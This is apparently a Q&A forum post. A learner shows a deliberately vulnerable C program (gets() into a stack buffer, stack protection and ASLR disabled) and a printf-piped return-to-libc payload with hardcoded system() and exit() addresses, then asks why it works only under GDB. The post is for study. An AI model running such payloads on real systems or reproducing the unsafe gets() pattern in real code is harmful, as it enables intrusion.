# (Another) Return to Libc Attack: Won't Segfault or Return to Libc With Malicious Input. Works in GDB though

Tags: c, security, buffer-overflow, libc

I'd like to learn how return to libc attacks work, so I have written a vulnerable program so that I can change the return address of a function to that of `system()`. However, the program doesn't appear to call `system()` and exits cleanly.

### Prerequisites

**-** I'm using Debain Squeeze

**-** I have disabled address randomization with:

```
echo 0 > /proc/sys/kernel/randomize_va_space
```

### Vulnerable Code

```
#include <stdio.h>

void someFunc(void);

void someFunc(void){
    char buffer[64];

    gets(buffer);
    //puts(buffer);
}

int main(int argc, char **argv)
{
    someFunc();
    return 0;
}
```

The code is compiled with:

```
gcc -fno-stack-protector -ggdb -o vuln vuln.c
```

Using GDB I have asserted that:

1. `/bin/zsh` is @ `0xbffff9b9`
2. `system()` is @ `0xb7ed0000`
3. `exit()` is @ `0xb7ec60f0`

### Exploit

I exploit it by piping in `72` zeros, exit, system and the pointer to `/bin/zsh`, in that order:

```
printf "%072x\xf0\x60\xec\xb7\x00\x00\xed\xb7\xb9\xf9\xff\xbf" | ./vuln
```

The program doesn't segfault or execute `/bin/zsh`.

### In GDB

Interestingly, if I change `SHELL="/xin/zsh"`, and execute it in gdb, the system call works:

```
Cannot exec /xin/zsh
```

So my questions are:

1. Have I understood the return to libc attack concept correctly?
2. Am I piping the malicious code in the correct way and order?
3. Why does it appear to work in GDB, but not in the shell? 
   (I've already read [return to libc works in gdb but not when running alone](https://stackoverflow.com/questions/4177996/return-to-libc-works-in-gdb-but-not-when-running-alone))

Comment: What platform are you on? Maybe you need `-O0` to disable inlining?

Comment: It's debian squeeze x86, running inside a virtualbox.

Comment: what does `bt` return after the segfault when you `run` this in gdb?

Comment: There may be a problem with aligning stack boundaries. Have you tried setting -mpreferred-stack-boundary=2 http://laramies.blogspot.com/2004/11/gcc-mpreferred-stack-boundarynum.html... this is crucial to get your exploit to work